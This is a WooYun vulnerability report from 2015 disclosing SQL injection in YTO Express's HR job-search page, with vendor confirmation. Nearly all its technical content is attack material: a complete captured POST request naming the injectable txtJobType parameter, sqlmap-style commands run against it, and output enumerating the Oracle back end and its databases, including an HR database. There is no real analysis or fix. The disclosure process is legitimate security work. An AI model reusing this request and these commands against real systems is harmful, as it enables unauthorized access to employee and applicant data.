当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163765

漏洞标题:圆通快递某处SQL注入一枚

相关厂商:圆通

漏洞作者: IceKing

提交时间:2015-12-23 10:59

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-23: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经确认,细节仅向厂商公开
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

RT

详细说明:

POST /HumanResources/cn/SocialHR/JobSearcher.aspx?id=&city=&jobType= HTTP/1.1
Host: hr.yto.net.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hr.yto.net.cn/HumanResources/cn/SocialHR/JobSearcher.aspx?id=&city=&jobType=
Cookie: BIGipServerNeiwang_2_8099=1942946058.41759.0000
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 8737
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTk5MDQ4Njg1MQ9kFgICAw9kFgYCAg9kFgJmD2QWAgIBDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJZB4LXyFEYXRhQm91bmRnZBAVJwnor7fpgInmi6kG576O5Zu9CeWPsOa5vuecgRXpppnmuK%2FnibnliKvooYzmlL%2FljLoV5r6z6Zeo54m55Yir6KGM5pS%2F5Yy6D%2Bilv%2BiXj%2BiHquayu%2BWMugnpmZXopb%2FnnIEJ6L695a6B55yBCeWxseS4nOecgQbljJfkuqwG5aSp5rSlCeays%2BWMl%2BecgQnmsZ%2Fopb%2FnnIEJ5bGx6KW%2F55yBEuWGheiSmeWPpOiHquayu%2BWMugnnpo%2Flu7rnnIEJ5rmW5Y2X55yBBuS4iua1twnmsZ%2Foi4%2FnnIEJ5rWZ5rGf55yBCeWuieW%2BveecgQnlkInmnpfnnIEM6buR6b6Z5rGf55yBFeWugeWkj%2BWbnuaXj%2BiHquayu%2BWMuhjmlrDnlobnu7TlkL7lsJToh6rmsrvljLoJ6LS15bee55yBCeS6keWNl%2BecgQnnlJjogoPnnIEJ6Z2S5rW355yBFeW5v%2Bilv%2BWjruaXj%2BiHquayu%2BWMugnmtbfljZfnnIEJ5rmW5YyX55yBBumHjeW6hgnlm5vlt53nnIEJ5rKz5Y2X55yBCeW5v%2BS4nOecgQbpppblsJQJ6buR5qOu5beeBuaCieWwvBUnATAgOGE4MTQyYzMzYTE2MmI4ZTAxM2E0NDQ3ZmRjNTFiYzAgOGE4MTQyYzMzYzZmOTQzODAxM2M4YTM4YjM3MTNkYmMgOGE4MTQyYzMzMjQ5OTBjNzAxMzI2NmJhNGY5ZTUwMzAgOGE4MTQyYzQzMjYyMDliZTAxMzI2NmJiN2I3MjE1NzQHMjU0MDEwMgcyNjEwMTAyBzIyMTAxMDIHMjM3MDEwMgcyMTEwMTAxBzIxMjAxMDEHMjEzMDEwMgcyMzYwMjAzBzIxNDAxMjEHMjE1MDEwMgcyMzUwMTAyBzI0MzA0ODIHMjMxMDEwMQcyMzIwMTAyBzIzMzAxMDIHMjM0MDEwMgcyMjIwMTAyBzIyMzAxMDIHMjY0MDEwNAcyNjUwMTAyBzI1MjAxMDIHMjUzMDEwMgcyNjIwNDIxBzI2MzAxMDIHMjQ1MDEwMgcyNDYwMTA1BzI0MjAxMDIHMjUwMDEwMQcyNTEwMTA0BzI0MTAxMDIHMjQ0MDEwMyA4YTgxNGZiMzUwYzcwZWE4MDE1MGQyMDNiY2Q5NDFmOSA4YTgxNGZiMjUxMjNkZTA5MDE1MTM3MDJlODRlNjA4NyA4YTgxNGZiMjUxNWI2ODZjMDE1MTVjYzI0OTJkMzAxMRQrAydnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2cWAWZkAgQPPCsAEQIADxYEHwJnHgtfIUl0ZW1Db3VudAINZAEQFgAWABYAFgJmD2QWHAIBD2QWDGYPZBYCZg8PFgQeBFRleHQFCeaTjeS9nOWRmB4LTmF2aWdhdGVVcmwFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDQzMjQ3NDYxNDkwZGQCAQ8PFgIfBAUS5aSq5Y6f5YiG5ouo5Lit5b%2BDZGQCAg8PFgIfBAUJ5bGx6KW%2F55yBZGQCAw8PFgIfBAUJ5aSq5Y6f5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTExLTE5ZAIFD2QWAgIBDw8WAh4PQ29tbWFuZEFyZ3VtZW50BZsBcGtKb2JMaWI9MjAxNDA3MTgwNDMyNDc0NjE0OTAmUGtSZWdDb3JwPTIwNDgmUGtSZWdEZXB0PTAwMDFWMjEwMDAwMDAwMDAzWkU4JlBrRW1wdHlKb2I9MjA0OFYyMTAwMDAwMDAwMDAwU0EmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3lpKrljp%2FliIbmi6jkuK3lv4NkZAICD2QWDGYPZBYCZg8PFgQfBAUM6KGM5pS%2F5LiT5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwODI4MDQxMDI1OTg0MDE5ZGQCAQ8PFgIfBAUV5LiK5rW36L2s6L%2BQ566h55CG6YOoZGQCAg8PFgIfBAUG5LiK5rW3ZGQCAw8PFgIfBAUJ5LiK5rW35biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTExLTE5ZAIFD2QWAgIBDw8WAh8GBaEBcGtKb2JMaWI9MjAxNTA4MjgwNDEwMjU5ODQwMTkmUGtSZWdDb3JwPTEwMDQmUGtSZWdEZXB0PTEwMDRCMTEwMDAwMDAwMDAwMFMzJlBrRW1wdHlKb2I9MTAwNFYyMTAwMDAwMDAwOE9MN1YmSm9iTmFtZT3ooYzmlL%2FkuJPlkZgmSm9iQ29tcGFueT3kuIrmtbfovazov5DnrqHnkIbpg6hkZAIDD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDQxMDE5OTc3NjgxZGQCAQ8PFgIfBAUM5Lic6I6e5Yy65Z%2BfZGQCAg8PFgIfBAUJ5bm%2F5Lic55yBZGQCAw8PFgIfBAUJ5Lic6I6e5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTEyZAIFD2QWAgIBDw8WAh8GBZUBcGtKb2JMaWI9MjAxNDA3MTgwNDEwMTk5Nzc2ODEmUGtSZWdDb3JwPTEwNDQmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWkMzJlBrRW1wdHlKb2I9MTA0NEIxMTAwMDAwMDAwMDAwU0UmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3kuJzojp7ljLrln59kZAIED2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDQxOTE4MzMwOTIzZGQCAQ8PFgIfBAUM5rex5Zyz5Yy65Z%2BfZGQCAg8PFgIfBAUJ5bm%2F5Lic55yBZGQCAw8PFgIfBAUJ5rex5Zyz5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTEyZAIFD2QWAgIBDw8WAh8GBZUBcGtKb2JMaWI9MjAxNDA3MTgwNDE5MTgzMzA5MjMmUGtSZWdDb3JwPTEwNDUmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWkFKJlBrRW1wdHlKb2I9MTA0NUIxMTAwMDAwMDAwMDAwU0UmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3mt7HlnLPljLrln59kZAIFD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwMjA1MDE0NzQ0OTk0MjQzZGQCAQ8PFgIfBAUM5rKz5Y2X55yB5Yy6ZGQCAg8PFgIfBAUJ5rKz5Y2X55yBZGQCAw8PFgIfBAUJ6YOR5bee5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZUBcGtKb2JMaWI9MjAxNTAyMDUwMTQ3NDQ5OTQyNDMmUGtSZWdDb3JwPTIyOTMmUGtSZWdEZXB0PTAwMDFWMjEwMDAwMDAwMDFCM0hIJlBrRW1wdHlKb2I9MjI5M1YyMTAwMDAwMDAwMDAwVEEmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3msrPljZfnnIHljLpkZAIGD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwMjA1MDExNTUyNTE3ODkwZGQCAQ8PFgIfBAUM5rmW5Y2X55yB5Yy6ZGQCAg8PFgIfBAUJ5rmW5Y2X55yBZGQCAw8PFgIfBAUJ6ZW%2F5rKZ5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZUBcGtKb2JMaWI9MjAxNTAyMDUwMTE1NTI1MTc4OTAmUGtSZWdDb3JwPTIyOTQmUGtSZWdEZXB0PTAwMDFWMjEwMDAwMDAwMDFCM0hYJlBrRW1wdHlKb2I9MjI5NFYyMTAwMDAwMDAwMDAwVEEmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3muZbljZfnnIHljLpkZAIHD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwNTIyMDIxMDMyNTY4MTk5ZGQCAQ8PFgIfBAUS5Y2X5piM6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rGf6KW%2F55yBZGQCAw8PFgIfBAUJ5Y2X5piM5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNTA1MjIwMjEwMzI1NjgxOTkmUGtSZWdDb3JwPTEwMjUmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWVRPJlBrRW1wdHlKb2I9MTAyNVYyMTAwMDAwMDAwQTVZSlomSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3ljZfmmIzovazov5DkuK3lv4NkZAIID2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwMjA2MDI1NjQzMzE4MjIyZGQCAQ8PFgIfBAUS5Y2X5Lqs6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rGf6IuP55yBZGQCAw8PFgIfBAUJ5Y2X5Lqs5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNTAyMDYwMjU2NDMzMTgyMjImUGtSZWdDb3JwPTEwMTgmUGtSZWdEZXB0PTAwMDFWMjEwMDAwMDAwMDA3NldJJlBrRW1wdHlKb2I9MTAxOFYyMTAwMDAwMDAwMDA2WjcmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3ljZfkuqzovazov5DkuK3lv4NkZAIJD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDMyOTIwOTU0MTQ1ZGQCAQ8PFgIfBAUS5Y2X6YCa6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rGf6IuP55yBZGQCAw8PFgIfBAUJ5Y2X6YCa5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNDA3MTgwMzI5MjA5NTQxNDUmUGtSZWdDb3JwPTEwMjEmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWUw2JlBrRW1wdHlKb2I9MTAyMUIxMTAwMDAwMDAwMDAwU0wmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3ljZfpgJrovazov5DkuK3lv4NkZAIKD2QWDGYPZBYCZg8PFgQfBAUV6Zeu6aKY5Lu25aSE55CG5LiT5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwMjA2MDMzMjEyODA2NjA0ZGQCAQ8PFgIfBAUS5Y2X6YCa6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rGf6IuP55yBZGQCAw8PFgIfBAUJ5Y2X6YCa5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBacBcGtKb2JMaWI9MjAxNTAyMDYwMzMyMTI4MDY2MDQmUGtSZWdDb3JwPTEwMjEmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWUwzJlBrRW1wdHlKb2I9MTAyMUIxMTAwMDAwMDAwMDAwUzgmSm9iTmFtZT3pl67popjku7blpITnkIbkuJPlkZgmSm9iQ29tcGFueT3ljZfpgJrovazov5DkuK3lv4NkZAILD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTUwMjA2MDMyMzAwMjM3MTU3ZGQCAQ8PFgIfBAUS5Y2X6YCa6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rGf6IuP55yBZGQCAw8PFgIfBAUJ5Y2X6YCa5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNTAyMDYwMzIzMDAyMzcxNTcmUGtSZWdDb3JwPTEwMjEmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWUw2JlBrRW1wdHlKb2I9MTAyMUIxMTAwMDAwMDAwMDAwU0wmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3ljZfpgJrovazov5DkuK3lv4NkZAIMD2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDM0NDIwNTg1MjYwZGQCAQ8PFgIfBAUS5a6B5rOi6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUJ5rWZ5rGf55yBZGQCAw8PFgIfBAUJ5a6B5rOi5biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNDA3MTgwMzQ0MjA1ODUyNjAmUGtSZWdDb3JwPTEwMDkmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWVBGJlBrRW1wdHlKb2I9MTAwOUIxMTAwMDAwMDAwMDAwU0UmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3lroHms6Lovazov5DkuK3lv4NkZAIND2QWDGYPZBYCZg8PFgQfBAUJ5pON5L2c5ZGYHwUFL0pvYkRldGFpbHMuYXNweD9Qa0VtcHR5Sm9iPTIwMTQwNzE4MDI1NzM0NzY4OTEzZGQCAQ8PFgIfBAUS5rWm5Lic6L2s6L%2BQ5Lit5b%2BDZGQCAg8PFgIfBAUG5LiK5rW3ZGQCAw8PFgIfBAUJ5LiK5rW35biCZGQCBA9kFgICAQ8WAh8EBQoyMDE1LTA4LTA0ZAIFD2QWAgIBDw8WAh8GBZsBcGtKb2JMaWI9MjAxNDA3MTgwMjU3MzQ3Njg5MTMmUGtSZWdDb3JwPTEwMjYmUGtSZWdEZXB0PTAwMDFCMTEwMDAwMDAwMDAwWDNBJlBrRW1wdHlKb2I9MTAyNkIxMTAwMDAwMDAwMDAwVDQmSm9iTmFtZT3mk43kvZzlkZgmSm9iQ29tcGFueT3mtabkuJzovazov5DkuK3lv4NkZAIODw8WAh4HVmlzaWJsZWhkZAIFDw8WBB4IUGFnZVNpemUCDR4LUmVjb3JkY291bnQCJWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlzZWFyY2hCdG4FEWd2Um1Kb2JEZXRhaWxJbmZvDzwrAAwBCAIBZOyvPb1%2FH7o6Fri4eRkG9UMa84pKaJGS4dAww3Ies2US&__EVENTVALIDATION=%2FwEWOgKmzq76CgLW1PCcCwLGu9ryBwLe5sUCAse9%2F%2BwDAqD03qACAqLMzmMC18Gh%2BQgChsOg%2FQEChsOQ%2BQECyMiUvwsCvdTy5g8CiuT6rAgC5Ij7rwkCq5bu1w4ChISytQkC6oO0ywMC6oPMyQMC4YivrQkCvdSK6w8Coc3Q3wYC5IjzrQkC18Gp%2BwgCoc3U2gYC5Ij3qAkCnZbhoAQC6oPAyAMCoc3o3QYC5IiLsgkCt%2BSOsAgC5IiHswkC6oPIygMC4sGm6gICoc3s2AYCsMS6rg8CpNr3%2FAwChsOo%2FwECyqqC4QYC0Kz8jwgClq%2F%2BlwoCqaa7wAICuKfyiwECtfPC9AoCnP7yuwkCrru67gEC3pap%2FQMC44bRwAQC1ICHuwgC2fCu%2FggC8tbIigYC98bwzQYC2PKzxAcC3ZiuwwICkK2W9gEClZ2%2BuQIC3pa1mQIC44bd3AIC1ICT1wbQNcw2DJKniqErH%2FGzJIpR35sdmbRgVdJ8jEEPjF8G0g%3D%3D&ddlProvince=0&ddlCity=0&txtJobType=%25&txtJobName=&searchBtn.x=60&searchBtn.y=16&Pages_input=1&select=http%3A%2F%2Fhr.yto56.com.cn
-r f:\k.txt
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
-r f:\k.txt --dbs
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] YT_TEST
[*] YTO_HR
-r f:\k.txt --tables


1.png


2.png


3.png


漏洞证明:

3.png

修复方案:

你们懂

版权声明:转载请注明来源 IceKing@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-24 10:13

厂商回复:

谢谢白帽子,我们已经在修复了。

最新状态:

暂无